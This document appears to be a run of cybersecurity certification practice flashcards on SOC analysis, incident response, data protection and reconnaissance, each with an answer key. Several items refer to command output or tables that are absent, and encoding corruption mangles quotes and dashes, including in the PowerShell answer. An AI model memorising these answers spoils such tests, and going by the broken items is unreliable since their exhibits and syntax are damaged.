✑ The application is likely to be targeted with SQL injection attacks due to the large number of reporting capabilities within the application.
As a result, the systems administrator upgrades outdated service applications and validates the endpoint configuration against an industry benchmark. The analyst suggests developers receive additional training on implementing identity and access management, and also implements a WAF to protect against SQL injection attacks. Which of the following BEST represents the technique in use?

A. Improving detection capabilities
B. Bundling critical assets
C. Profiling threat actors and activities
D. Reducing the attack surface area

A

D. Reducing the attack surface area

78
Q

A security analyst working in the SOC recently discovered instances in which hosts visited a specific set of domains and IPs and became infected with malware.
Which of the following is the MOST appropriate action to take in this situation?

A. Implement an IPS signature for the malware and update the blacklisting for the associated domains and IPs
B. Implement an IPS signature for the malware and another signature request to block all the associated domains and IPs
C. Implement a change request to the firewall setting to not allow traffic to and from the IPs and domains
D. Implement an IPS signature for the malware and a change request to the firewall setting to not allow traffic to and from the origin IPs subnets and second-level domains

A

D. Implement an IPS signature for the malware and a change request to the firewall setting to not allow traffic to and from the origin IPs subnets and second-level domains

79
Q

The help desk notified a security analyst that emails from a new email server are not being sent out. The new email server was recently added to the existing ones. The analyst runs the following command on the new server:

Given the output, which of the following should the security analyst check NEXT?

A. The DNS name of the new email server
B. The version of SPF that is being used
C. The IP address of the new email server
D. The DMARC policy

A

C. The IP address of the new email server

80
Q

Which of the following should a database administrator implement to BEST protect data from an untrusted server administrator?

A. Data deidentification
B. Data encryption
C. Data masking
D. Data minimization

A

B. Data encryption

81
Q

A forensic analyst took an image of a workstation that was involved in an incident. To BEST ensure the image is not tampered with, the analyst should use:

A. hashing
B. backup tapes
C. a legal hold
D. chain of custody

A

A. hashing

82
Q

An organization wants to mitigate against risks associated with network reconnaissance. ICMP is already blocked at the firewall; however, a penetration testing team has been able to perform reconnaissance against the organizationג€™s network and identify active hosts. An analyst sees the following output from a packet capture:

Which of the following phrases from the output provides information on how the testing team is successfully getting around the ICMP firewall rule?

A. flags=RA indicates the testing team is using a Christmas tree attack
B. ttl=64 indicates the testing team is setting the time to live below the firewallג€™s threshold
C. 0 data bytes indicates the testing team is crafting empty ICMP packets
D. NO FLAGS are set indicates the testing team is using hping

A

D. NO FLAGS are set indicates the testing team is using hping

83
Q

A security analyst is investigating malicious traffic from an internal system that attempted to download proxy avoidance as identified from the firewall logs, but the destination IP is blocked and not captured. Which of the following should the analyst do?

A. Shut down the computer
B. Capture live data using Wireshark
C. Take a snapshot
D. Determine if DNS logging is enabled
E. Review the network logs
A

D. Determine if DNS logging is enabled

84
Q

An organization is assessing risks so it can prioritize its mitigation actions. Following are the risks and their probability and impact:

Which of the following is the order of priority for risk mitigation from highest to lowest?

A. A, B, C, D
B. A, D, B, C
C. B, C, A, D
D. C, B, D, A
E. D, A, C, B
A

B. A, D, B, C

85
Q

The Chief Information Officer (CIO) of a large healthcare institution is concerned about all machines having direct access to sensitive patient information. Which of the following should the security analyst implement to BEST mitigate the risk of sensitive data exposure?

A. A cloud access service broker system
B. NAC to ensure minimum standards are met
C. MFA on all workstations
D. Network segmentation

A

D. Network segmentation

86
Q

A Chief Information Security Officer (CISO) is concerned developers have too much visibility into customer data. Which of the following controls should be implemented to BEST address these concerns?

A. Data masking
B. Data loss prevention
C. Data minimization
D. Data sovereignty

A

A. Data masking

87
Q

A security analyst is supporting an embedded software team. Which of the following is the BEST recommendation to ensure proper error handling at runtime?

A. Perform static code analysis
B. Require application fuzzing
C. Enforce input validation
D. Perform a code review

A

B. Require application fuzzing

88
Q

Which of the following MOST accurately describes an HSM?

A. An HSM is a low-cost solution for encryption
B. An HSM can be networked based or a removable USB
C. An HSM is slower at encrypting than software
D. An HSM is explicitly used for MFA

A

B. An HSM can be networked based or a removable USB

89
Q

A company is moving from the use of web servers hosted in an internal datacenter to a containerized cloud platform. An analyst has been asked to identify indicators of compromise in the containerized environment. Which of the following would BEST indicate a running container has been compromised?

A. A container from an approved software image has drifted
B. An approved software orchestration container is running with root privileges
C. A container from an approved software image has stopped responding
D. A container from an approved software image fails to start

A

A. A container from an approved software image has drifted

90
Q

A cybersecurity analyst is investigating a potential incident affecting multiple systems on a companyג€™s internal network. Although there is a negligible impact to performance, the following symptoms are present on each of the affected systems:
✑ Existence of a new and unexpected svchost.exe process
✑ Persistent, outbound TCP/IP connections to an unknown external host with routine keep-alives transferred
✑ DNS query logs showing successful name resolution for an Internet-resident dynamic DNS domain
If this situation remains unresolved, which of the following will MOST likely occur?

A. The affected hosts may participate in a coordinated DDoS attack upon command
B. An adversary may leverage the affected hosts to reconfigure the companyג€™s router ACLs
C. Key files on the affected hosts may become encrypted and require ransom payment for unlock
D. The adversary may attempt to perform a man-in-the-middle attack

A

A. The affected hosts may participate in a coordinated DDoS attack upon command

91
Q

Massivelog.log has grown to 40GB on a Windows server. At this size, local tools are unable to read the file, and it cannot be moved off the virtual server where it is located. Which of the following lines of PowerShell script will allow a user to extract the last 10,000 lines of the log for review?

A. tail -10000 Massivelog.log > extract.txt
B. info tail n -10000 Massivelog.log | extract.txt;
C. get content ג€˜./Massivelog.logג€™ ג€”Last 10000 | extract.txt
D. get-content ג€˜./Massivelog.logג€™ ג€”Last 10000 > extract.txt;

A

get-content ג€˜./Massivelog.logג€™ ג€”Last 10000 > extract.txt;

92
Q

Which of the following are components of the intelligence cycle? (Choose two.)

A. Collection
B. Normalization
C. Response
D. Analysis
E. Correction
F. Dissension
A

A. Collection

D. Analysis

93
Q

A financial institutionג€™s business unit plans to deploy a new technology in a manner that violates existing information security standards. Which of the following actions should the Chief Information Security Officer (CISO) take to manage any type of violation?

A. Enforce the existing security standards and controls
B. Perform a risk analysis and qualify the risk with legal
C. Perform research and propose a better technology
D. Enforce the standard permits

A

B. Perform a risk analysis and qualify the risk with legal